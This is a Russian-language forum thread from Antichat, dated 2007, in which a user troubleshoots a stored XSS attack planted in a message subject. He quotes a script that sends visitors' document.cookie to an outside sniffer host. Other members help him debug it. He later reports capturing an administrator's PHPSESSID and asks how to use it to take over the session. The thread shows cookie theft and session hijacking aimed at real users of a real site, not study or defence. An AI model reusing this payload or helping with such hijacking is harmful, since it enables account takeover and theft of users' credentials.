Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

09.09.2007, 17:30
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 6
Провел на форуме: 28251
Репутация:
0
|
|
Подскажите
Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
|
|
|

09.09.2007, 18:40
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме: 2313429
Репутация:
728
|
|
Хм, наверное потому что пока только ты просмотрел эту тему
|
|
|

09.09.2007, 18:52
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме: 3326855
Репутация:
702
|
|
"http://s.netsec.ru/mda.gif?"
вместо mda.gif впиши свой_ник.gif
|
|
|

09.09.2007, 21:27
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 6
Провел на форуме: 28251
Репутация:
0
|
|
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
Последний раз редактировалось Perec333; 09.09.2007 в 21:57..
|
|
|

10.09.2007, 11:14
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

10.09.2007, 11:22
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме: 5868159
Репутация:
950
|
|
Сообщение от Perec333
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
А ты недумал что в некоторвх браузерах XSS непашет 
|
|
|

10.09.2007, 15:43
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 6
Провел на форуме: 28251
Репутация:
0
|
|
Дык не на одном человеке проверял, у всех непохать не может))))
|
|
|

10.09.2007, 22:22
|
|
Новичок
Регистрация: 07.09.2007
Сообщений: 6
Провел на форуме: 28251
Репутация:
0
|
|
наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|